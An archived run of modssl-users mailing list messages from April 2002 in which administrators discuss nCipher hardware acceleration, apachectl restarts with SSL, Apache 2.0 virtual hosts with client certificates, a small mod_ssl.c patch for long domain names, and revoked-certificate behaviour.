# LD_LIBRARY_PATH=/usr/lib:/opt/nfast/toolkits/hwcrhk
# export LD_LIBRARY_PATH
# openssl speed -engine chil

d) now you have openssl talking nCipher ok, you need to recompile
mod_ssl to use openssl-engine... use apache 1.3.24, and configure with
SSL_EXPERIMENTAL option (without this, you cant get it to use nCipher).

e) check you built httpd right:

# LD_LIBRARY_PATH=/usr/lib:/opt/nfast/toolkits/hwcrhk
# export LD_LIBRARY_PATH
# httpd -L | grep SSLCryptoDevice

f) add the following line to httpd.conf:

SSLCryptoDevice chil

Note this shows you how to get any nCipher to provide hardware
acceleration, I think the stuff about getting apache to use keys stored
in an nForce HSM is another topic altogether, and best left off-list
unless enough people want to hear the gory details...

Regards,

PeterV.


Alex.Apostolopoulos@secartis.com wrote:

>Hi,
>
>does anybody have any experience, links or hints how connect mod_ssl and
>enchiper boxes ???
>
>
>As I am new to this list I am not sure if this is right place to ask this
>question.
>
>cheers Alex Apostolopoulos
>_______________________________________________________
>WebTechnology & Smart Card Solutions
>
>Secartis AG-eSolutions by Giesecke & Devrient
>Bretonischer Ring 3, D-85630 Grasbrunn, Germany
>
>Phone: +49(0)89 4119-7086, Fax: +49(0)89 4119-7403
>Email: alex.apostolopoulos@secartis.com, Home: www.secartis.com
>_______________________________________________________
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 19:22:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA09392; Mon, 22 Apr 2002 19:21:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id TAA09372; Mon, 22 Apr 2002 19:20:39 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GUZC6A00.S8U for ; Mon, 22 Apr 2002
          18:20:34 +0100 
Message-ID: <3CC44665.5050805@itaction.co.uk>
Date: Mon, 22 Apr 2002 18:20:37 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: potential apachectl modification
References: <3CC400C7.17918.ED39B29@localhost> <20020422163428.GA31474@squaretrade.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

soft restarts like this crash httpd if you have added/deleted SSL key or
certificate lines to the config file - in these cases you must fully
stop/restart the daemon.

So I would say there is a case for a restartssl option, although I'm
happy enough to run stop, check for all daemons dying, then running
startssl as changing certs/keys is usually an infrequent task.


Glen Mehn wrote:

>'restart' and 'graceful' will restart the server with -DSSL, if it's (currently)running with -DSSL.
>
>'restart' sends a SIGHUP to apache
>'graceful' sends a SIGUSR1 to apache, which httpd reads as 'finish what you're doing, then HUP yourself'.
>
>glen
>
>On Mon, Apr 22, 2002 at 12:23:35PM -0400, Aryeh Katz wrote:
>
>
>>Does it make sense to have a restartssl directive, to match the restart
>>directive?
>>
>>---
>>Aryeh Katz
>>VASCO
>>www.vasco.com
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>
>
>--
>Glen S Mehn
>Contract Systems Administrator		SquareTrade, Inc
>glen@squaretrade.com	Building Trust in Transactions (sm)
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 19:27:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA09713; Mon, 22 Apr 2002 19:26:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id TAA09624; Mon, 22 Apr 2002 19:25:33 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GUZCEH00.4A3 for ; Mon, 22 Apr 2002
          18:25:29 +0100 
Message-ID: <3CC4478B.4020206@itaction.co.uk>
Date: Mon, 22 Apr 2002 18:25:31 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: potential apachectl modification
References: <3CC40B79.10529.EFD6168@localhost>
Content-Type: multipart/alternative;
 boundary="------------060001090900080306000105"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------060001090900080306000105
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

httpd -t will error on SSL stuff not between  lines. I
think you'll find that your LoadModule is in an ifDefine while the
unloadmodule isnt.

httpd -DSSL -t is the way to check all the syntax in httpd.conf, without
the -DSSL you're only checking half of it.

Aryeh Katz wrote:

>>Use apachectl graceful.
>>
>>
>>
>I suppose I should have done a little more research before posting.
>I had a script that did a restart, and the restart reported an error. I then tried a
>start and everything worked fine, so I assumed that restart did a kill then a
>start, and thus needed to be changed for ssl.
>Once I got these mails, I looked a little closer, and I'm seeing some strange
>behavior.
>apachectl configtest complains on SSLEngine off in my :80 virtual host.
>Fine, doesn't bother me, I comment it out (wondering why only httpd -t
>complains, and not a regular startup).
>I then ran apachectl configtest again, and it reported no errors.
>I ran httpd -t from the command line, and it said
>Syntax OK
>Segmentation Fault.
>Call stack on the Segmentation Fault indicates that it's on the
>unload_module.
>I do have a module of my own that is loaded, which when removed, allows
>httpd -t to run fine.
>Does anyone have any suggestions for what my module might be doing to
>cause the configtest to core on unload?
>Thanks.
>Aryeh
>
>
>
>>Frank
>>
>>----- Original Message -----
>>From: "Aryeh Katz" 
>>To: 
>>Sent: Monday, April 22, 2002 9:23 AM
>>Subject: potential apachectl modification
>>
>>
>>
>>
>>>Does it make sense to have a restartssl directive, to match the
>>>restart directive?
>>>
>>>---
>>>Aryeh Katz
>>>VASCO
>>>www.vasco.com
>>>
>>>____________________________________________________________________
>>>__ Apache Interface to OpenSSL (mod_ssl)
>>>www.modssl.org User Support Mailing List
>>>modssl-users@modssl.org Automated List Manager
>>>     majordomo@modssl.org
>>>
>>>
>>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>
>
>
>---
>Aryeh Katz
>VASCO
>www.vasco.com
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>



--------------060001090900080306000105
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


httpd -t will error on SSL stuff not between <ifDefine SSL> lines.
I think you'll find that your LoadModule is in an ifDefine while the unloadmodule
isnt.



httpd -DSSL -t is the way to check all the syntax in httpd.conf, without
the -DSSL you're only checking half of it.



Aryeh Katz wrote:



  

    
Use apachectl graceful.

    

  

  
I suppose I should have done a little more research before posting.
I had a script that did a restart, and the restart reported an error. I then tried a
start and everything worked fine, so I assumed that restart did a kill then a
start, and thus needed to be changed for ssl.
Once I got these mails, I looked a little closer, and I'm seeing some strange
behavior.
apachectl configtest complains on SSLEngine off in my :80 virtual host.
Fine, doesn't bother me, I comment it out (wondering why only httpd -t
complains, and not a regular startup).
I then ran apachectl configtest again, and it reported no errors.
I ran httpd -t from the command line, and it said
Syntax OK
Segmentation Fault.
Call stack on the Segmentation Fault indicates that it's on the
unload_module.
I do have a module of my own that is loaded, which when removed, allows
httpd -t to run fine.
Does anyone have any suggestions for what my module might be doing to
cause the configtest to core on unload?
Thanks.
Aryeh

  

  

    
Frank

----- Original Message -----
From: "Aryeh Katz" <aryeh@vasco.com>
To: <modssl-users@modssl.org>
Sent: Monday, April 22, 2002 9:23 AM
Subject: potential apachectl modification


    

    

      
Does it make sense to have a restartssl directive, to match the
restart directive?

---
Aryeh Katz
VASCO
www.vasco.com

____________________________________________________________________
__ Apache Interface to OpenSSL (mod_ssl)
www.modssl.org User Support Mailing List
modssl-users@modssl.org Automated List Manager
     majordomo@modssl.org

      

    

    
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
    

  

  


---
Aryeh Katz
VASCO
www.vasco.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
  










--------------060001090900080306000105--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 19:39:43 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA10136; Mon, 22 Apr 2002 19:38:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ewok.sytrix.com id TAA10101; Mon, 22 Apr 2002 19:37:20 +0200 (MET DST)
Received: from 226.balt.vasco.com (gateway.vasco.com [209.140.121.226])
	by ewok.sytrix.com (8.11.6/8.11.6) with SMTP id g3MGgRP08543
	for ; Mon, 22 Apr 2002 12:42:27 -0400
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [209.140.121.242]) with SMTP; 22 Apr 2002 17:36:50 UT
Date: Mon, 22 Apr 2002 13:34:11 -0400
MIME-Version: 1.0
Subject: Re: potential apachectl modification
Message-ID: <3CC41153.2969.F143B39@localhost>
In-reply-to: <3CC4478B.4020206@itaction.co.uk>
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> httpd -t will error on SSL stuff not between  lines. I
> think you'll find that your LoadModule is in an ifDefine while the
> unloadmodule isnt.
> 
You are correct.
Putting all my stuff (which was compiled with EAPI) in the IfDefine solved the 
problem.

> httpd -DSSL -t is the way to check all the syntax in httpd.conf,
> without the -DSSL you're only checking half of it.
So this seems to be saying that it makes sense to have a restartssl, right?


---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 19:47:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA10505; Mon, 22 Apr 2002 19:46:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.speakeasy.net id TAA10492; Mon, 22 Apr 2002 19:46:03 +0200 (MET DST)
Received: (qmail 18429 invoked from network); 22 Apr 2002 17:46:00 -0000
Received: from unknown (HELO bio2) ([64.24.216.101]) (envelope-sender )
          by mail14.speakeasy.net (qmail-ldap-1.03) with SMTP
          for ; 22 Apr 2002 17:46:00 -0000
Message-ID: <00af01c1ea25$ff377a80$65d81840@bio2>
From: "Frank Reichenbacher" 
To: 
References: <3CC40B79.10529.EFD6168@localhost>
Subject: Re: potential apachectl modification
Date: Mon, 22 Apr 2002 10:49:02 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frank Reichenbacher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sheesh! I must be lucky, I have not experienced any of these problems and
the past several weeks I've been using apachectl graceful every few minutes
while I set up my SSL server.

Always the safest bet is to do a full stop/start, however, users online may
experience frustrating behaviors and then you have to commit that damn
passkey to memory. If you can get away with it restart -DSSL or graceful
will suffice for most purposes.

Frank

----- Original Message -----
From: "Aryeh Katz" 
To: 
Sent: Monday, April 22, 2002 10:09 AM
Subject: Re: potential apachectl modification


> > Use apachectl graceful.
> >
> I suppose I should have done a little more research before posting.
> I had a script that did a restart, and the restart reported an error. I
then tried a
> start and everything worked fine, so I assumed that restart did a kill
then a
> start, and thus needed to be changed for ssl.
> Once I got these mails, I looked a little closer, and I'm seeing some
strange
> behavior.
> apachectl configtest complains on SSLEngine off in my :80 virtual host.
> Fine, doesn't bother me, I comment it out (wondering why only httpd -t
> complains, and not a regular startup).
> I then ran apachectl configtest again, and it reported no errors.
> I ran httpd -t from the command line, and it said
> Syntax OK
> Segmentation Fault.
> Call stack on the Segmentation Fault indicates that it's on the
> unload_module.
> I do have a module of my own that is loaded, which when removed, allows
> httpd -t to run fine.
> Does anyone have any suggestions for what my module might be doing to
> cause the configtest to core on unload?
> Thanks.
> Aryeh
>
> > Frank
> >
> > ----- Original Message -----
> > From: "Aryeh Katz" 
> > To: 
> > Sent: Monday, April 22, 2002 9:23 AM
> > Subject: potential apachectl modification
> >
> >
> > > Does it make sense to have a restartssl directive, to match the
> > > restart directive?
> > >
> > > ---
> > > Aryeh Katz
> > > VASCO
> > > www.vasco.com
> > >
> > > ____________________________________________________________________
> > > __ Apache Interface to OpenSSL (mod_ssl)
> > > www.modssl.org User Support Mailing List
> > > modssl-users@modssl.org Automated List Manager
> > >      majordomo@modssl.org
> > >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
>
>
> ---
> Aryeh Katz
> VASCO
> www.vasco.com
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 19:49:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA10612; Mon, 22 Apr 2002 19:48:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA10575; Mon, 22 Apr 2002 19:47:48 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6936B4CE74B; Mon, 22 Apr 2002 19:47:47 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3MHbqe21497; Mon, 22 Apr 2002 19:37:52 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web11302.mail.yahoo.com id NAA21329; Mon, 22 Apr 2002 13:40:10 +0200 (MET DST)
Message-ID: <20020422114008.834.qmail@web11302.mail.yahoo.com>
Received: from [202.60.128.3] by web11302.mail.yahoo.com via HTTP; Mon, 22 Apr 2002 04:40:08 PDT
Date: Mon, 22 Apr 2002 04:40:08 -0700 (PDT)
From: Sonu Kishore 
Subject: http & https on apache 2.0
To: jeremyw@dicecorp.com, modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sonu Kishore 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have configured my httpd.conf & ssl.conf file also but probably I am not
doing some thing right as my site is not opening as required.

My Q is 
How do i configure my http.conf & ssl.conf in apache 2.0 
if -
I have one page which has to be http
I have the second page which has to be https with sslverifyclient none
I have a third page which is https with sslverifyclient require


Regards

Sonu

__________________________________________________
Do You Yahoo!?
Yahoo! Games - play chess, backgammon, pool and more
http://games.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 19:49:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA10622; Mon, 22 Apr 2002 19:48:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA10574; Mon, 22 Apr 2002 19:47:48 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 5B0404CE745; Mon, 22 Apr 2002 19:47:47 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3MHbLk21491; Mon, 22 Apr 2002 19:37:21 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web11306.mail.yahoo.com id NAA20930; Mon, 22 Apr 2002 13:32:11 +0200 (MET DST)
Message-ID: <20020422113209.83744.qmail@web11306.mail.yahoo.com>
Received: from [202.60.128.3] by web11306.mail.yahoo.com via HTTP; Mon, 22 Apr 2002 04:32:09 PDT
Date: Mon, 22 Apr 2002 04:32:09 -0700 (PDT)
From: Sonu Kishore 
Subject: Re; Even more so - Re: Urgent Help
To: andrewl@theaclgroup.com, modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sonu Kishore 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear Andrew Lietzow

Thanx for the reply....& advice.
I have not taken any short cuts...
I had my apache 1.3.x working using apache/mod_ssl & openssl 
my site would open only using ssl.
Then I had to migrate to apache 2.0.. for some reason... that too only in one
day.
That is the reason I floated my qs in the open space.

By the way 
I have already configured my redhat linux 7.1 with apache 2.0 &openssl.
made my web server my Certificate authority using all openssl commands 

I have my 
ca.key
ca.crt
webserver.key
webserver.csr
webserver.crt
client.key
client.csr
client.crt
client.p12 keys ready.

I have configured my httpd.conf & ssl.conf file also but probably I am not
doing some thing right as my site is not opening as required.

I have one page which has to be http
I have the second page which has to be https with sslverifyclient none
I have a third page which is https with sslverifyclient require

I have read that i will require IP base virtual hosts.

Now... after doing a lot of hit & try I am stuck... if u can provide me some
help I shall be gratefull.

My project has to go live (intranet) by tomorrow.

Reply me at sonu@rolta.com

Regards

Sonu


__________________________________________________
Do You Yahoo!?
Yahoo! Games - play chess, backgammon, pool and more
http://games.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 19:49:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA10650; Mon, 22 Apr 2002 19:48:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA10578; Mon, 22 Apr 2002 19:47:50 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8A5FF4CE759; Mon, 22 Apr 2002 19:47:47 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3MHlQ021625; Mon, 22 Apr 2002 19:47:26 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web11302.mail.yahoo.com id SAA07476; Mon, 22 Apr 2002 18:44:05 +0200 (MET DST)
Message-ID: <20020422164402.50723.qmail@web11302.mail.yahoo.com>
Received: from [202.60.128.3] by web11302.mail.yahoo.com via HTTP; Mon, 22 Apr 2002 09:44:02 PDT
Date: Mon, 22 Apr 2002 09:44:02 -0700 (PDT)
From: Sonu Kishore 
Subject: Re: important - virtual hosts for apache 2.0
To: andrewl@theaclgroup.com, modssl-users@modssl.org
In-Reply-To: <00a601c1e9fc$a71535a0$4d38e63f@microanswers.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sonu Kishore 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanx Andrew for a quick response.

I am in a mess ... this project landed in my lap just 8 days back when I new
nothing about apache's httpd.conf or PKI or openssl etc etc.. 
But today i feel so much more aware.

[http page]
The problem is in our intranet site we have first page which has to be a http
page where the new user sends a request for certificate to my CA.

[https Page - SSLVerifyClient none]
The second page is where the new user is asked to provide user id & PEM pass
phrase to generate a certificate

[http page - SSLVerifyClient require]
The third page where all registered users fill there user id & password and use
the intranet aaplication.

now I need to create three virtual hosts in
[httpd.conf file]
[ssl.conf file]
how do configure the two files for the same.

1. where do i put the virtual host details for http page
2. where do i put the virtual host details for https page SSLVerifyClient none
3. where do i put the virtual host details for https page SSLVerifyClient
require

Please suggest.

Regards

Sonu.




--- Andrew Lietzow  wrote:
> Dear Sonu,
> RE:>>I have configured my httpd.conf & ssl.conf file also but probably I am
> not
> doing something right as my site is not opening as required.
> ...and...
> RE:>>> I have one page which has to be http
> > I have the second page which has to be https with sslverifyclient none
> > I have a third page which is https with sslverifyclient require
> > I have read that i will require IP base virtual hosts.
> ...and...
> RE:>>
> I want to use apache 2.0 how do I configure it with mod_ssl & openssl.
> --------
> Okay, now that you have shared the background, what exactly is happening?  I
> guess the reason I was (on Saturday) curious as to whether you have followed
> guides available
> from Apache, openssl, and mod_ssl is because FOR ME, the Apache 2.0.35
> system
> configured very quickly to provide a secure server, without hardly a
> whimper.  Download the tarball,
> run configure, generate the key, csr, and crt, and voila, secure server is
> up and running.  This does
> not, however, address your last configuration, with sslverifyclient =>
> require.  That I have not tried.
> 
> However, if you can provide the scenario for your error or perceived
> disfunctionality of the system,
> then possibly someone can help you quickly move forward.  I doubt that it is
> I, but send
> more information and I'll be glad to help if I can.  Most here will do the
> same, or so I believe,
> or they probably wouldn't continue to subscribe.
> 
> Take some time to thoroughly clearly describe the error or the problem and
> you may get some
> very quick help.
> 
> Good Luck!
> 
> Andrew Lietzow
> The ACL Group, Inc.
> 


__________________________________________________
Do You Yahoo!?
Yahoo! Games - play chess, backgammon, pool and more
http://games.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 20:54:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA13652; Mon, 22 Apr 2002 20:53:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nt01.mercantec.com id UAA13621; Mon, 22 Apr 2002 20:52:50 +0200 (MET DST)
From: kwills@mercantec.com
Received: by nt01.merc.local with Internet Mail Service (5.5.2650.21)
	id ; Mon, 22 Apr 2002 13:52:45 -0500
Message-ID: 
To: modssl-users@modssl.org
Subject: Possible fix for long domain names and mod_ssl
Date: Mon, 22 Apr 2002 13:52:44 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kwills@mercantec.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have encountered the same problem as Bernard L du Breuil dealing with with
long domain names and mod_ssl.

This change to mod_ssl.c in Apache 2.0.35 is from looking at a
ssl_engine_ext.c in mod_ssl version 2.8.8.

Kevin
kwills@mercantec.com


*** mod_ssl.c0  Tue Apr  2 08:30:08 2002
--- mod_ssl.c   Mon Apr 22 10:37:46 2002
***************
*** 259,264 ****
--- 259,265 ----
  static int ssl_hook_pre_connection(conn_rec *c, void *csd)
  {
      SSLSrvConfigRec *sc = mySrvConfig(c->base_server);
+     char *cpVHostID, *cpVHostMD5;
      SSL *ssl;
      SSLConnRec *sslconn = myConnConfig(c);
      modssl_ctx_t *mctx;
***************
*** 312,320 ****
          return DECLINED; /* XXX */
      }

!     if (!SSL_set_session_id_context(ssl,
!                                     (unsigned char *)sc->vhost_id,
!                                     sc->vhost_id_len))
      {
          ssl_log(c->base_server, SSL_LOG_ERROR|SSL_ADD_SSLERR,
                  "Unable to set session id context to `%s'", sc->vhost_id);
--- 313,321 ----
          return DECLINED; /* XXX */
      }

!       cpVHostID = ssl_util_vhostid(c->pool, c->base_server);
!       cpVHostMD5 = ap_md5(c->pool, (unsigned char *)cpVHostID);
!       if (!SSL_set_session_id_context(ssl, (unsigned char *)cpVHostMD5,
strlen(cpVHostMD5)))
      {
          ssl_log(c->base_server, SSL_LOG_ERROR|SSL_ADD_SSLERR,
                  "Unable to set session id context to `%s'", sc->vhost_id);
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 21:38:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA15476; Mon, 22 Apr 2002 21:37:53 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from casica.homeip.net id VAA15443; Mon, 22 Apr 2002 21:37:00 +0200 (MET DST)
Received: by casica.homeip.net (Postfix, from userid 1001)
	id E94CF113081; Mon, 22 Apr 2002 21:36:46 +0200 (CEST)
Date: Mon, 22 Apr 2002 21:36:46 +0200
From: Paco Brufal 
To: modssl-users@modssl.org
Subject: browser 'hangs' with revocated certifications
Message-ID: <20020422193646.GA12896@mutoid.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
X-Mailer: MensAlzheimer 2000 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paco Brufal 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

	I have an Apache with mod_ssl running fine, and I can revoke client
certificates, but when a client which certificated has been revoked try to
view the pages on the server, Apache says in the logs that the certificate
is not valid (this is ok), but it doesn't answer the browser, and the
browser waits, and waits, and waits, and waits, ... :(

	Is there any way to show an error when the client certificate is
revoked and Apache doesn't allow it? Thanks :)

...Ecstasy You Got What I Need. Rob Gee. 1996
--- Mutt 1.3.28 + Postfix
 * Origin: Web Personal: http://pbrufal.kleenux.org (2:346/3.68)
 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 21:43:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA15683; Mon, 22 Apr 2002 21:41:48 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns1.microanswers.net id VAA15656; Mon, 22 Apr 2002 21:41:07 +0200 (MET DST)
Received: from ws1 (microanswers.net [63.230.56.77] (may be forged))
	by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g3MJOoC05895
	for ; Mon, 22 Apr 2002 14:24:51 -0500
Message-ID: <01f601c1ea35$e8a3cde0$4d38e63f@microanswers.net>
From: "Andrew Lietzow" 
To: 
References: <20020422164402.50723.qmail@web11302.mail.yahoo.com>
Subject: Re: important - virtual hosts for apache 2.0
Date: Mon, 22 Apr 2002 14:42:59 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrew Lietzow" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello Sonu,
RE:>>1. where do i put the virtual host details for http page<
In the virtual host directive section of your httpd.conf file.
Is this working?  If not, what about it does not work?  Once you have the
Secure ServerName, and
DocumentRoot for the MAIN server set, does the main server come up okay?  If
not, you will probably have
trouble making the virtual host work.

